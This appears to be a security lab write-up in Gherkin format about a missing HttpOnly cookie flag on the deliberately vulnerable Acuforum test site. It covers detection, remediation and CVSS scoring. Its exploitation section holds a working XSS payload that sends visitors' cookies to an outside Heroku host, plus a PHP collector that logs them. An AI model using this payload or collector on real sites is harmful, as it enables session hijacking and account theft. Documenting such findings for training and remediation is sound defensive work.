## Version 1.4.1
## language: en

Feature:
  TOE:
    Acuforum
  Category:
    Sensitive cookie without "HttpOnly" flag
  Location:
    https://testasp.vulnweb.com/showforum.asp?id=0 - Cookie (header)
  CWE:
    CWE-1004: Sensitive cookie without "HttpOnly" flag
    https://cwe.mitre.org/data/definitions/1004.html
  Rule:
    REQ.029: https://fluidattacks.com/web/rules/029/
  Goal:
    Detect and exploit bad flagged sensitive cookie
  Recommendation:
    Set the HttpOnly flag when storing a sensitive cookie in a response.

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Ubuntu            | 18.04.3 LTS     |
    | Firefox           | 69.0            |
  TOE information:
    Given I am accessing the site http://testasp.vulnweb.com
    And I can log in
    And I enter an "ASP.NET" site
    And the server is running Microsoft SQL Server version 8.5

  Scenario: Normal use case
    When I enter the forum of the website
    Then I can see the posts

  Scenario: Static detection
    When I don't have access to source code
    Then I can't do the static detection

  Scenario: Dynamic detection
    When I inspect the website through the developer tools of Firefox
    Then I can see the cookies are set to "HttpOnly: false"
    And I can conclude that it can be affected by cookie no "HttpOnly" flag

  Scenario: Exploitation
    When I use this JavaScript injection in conjunction with this vulnerability
    """
    <script>
    document.location='https://thawing-badlands-08862.herokuapp.com/
    cookiestealer.php?c='+document.cookie;
    </script>
    """
    And I use a simple "Heroku web app"
    """
    https://thawing-badlands-08862.herokuapp.com/cookiestealer.php
    """
    And I use a PHP code to store the cookies and redirect to Google website
    """
    <?php
    header ('Location:https://google.com');
            $cookies = $_GET["c"];
            $file = fopen('log.txt', 'a');
            fwrite($file,$cookies . "\n\n")
    ?>
    https://thawing-badlands-08862.herokuapp.com/log.txt
    """
    And I can intercept everyone who visits the page [evidence](img1.png)
    And I can store the cookies [evidence](img2.png)
    And I can conclude that it can be affected by improper input validation

  Scenario: Remediation
    Given the site is using unsafe mechanisms to store the cookies
    When I inspect the cookies of the website it must show "HttpOnly: true"
    And It must set the HttpOnly flag when storing a sensitive cookie.

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.4/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    5.2/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.1/10 (Medium) - CR:H/IR:H/AR:M

  Scenario: Correlations
    vbd/acuforum/0079-xss-forum
      Given I can see the "HttpOnly" flag is set to false
      And I can create a JavaScript code provided by 0079-xss-forum
      When someone visits the forum page
      Then I can steal the cookies of everyone who visit the page
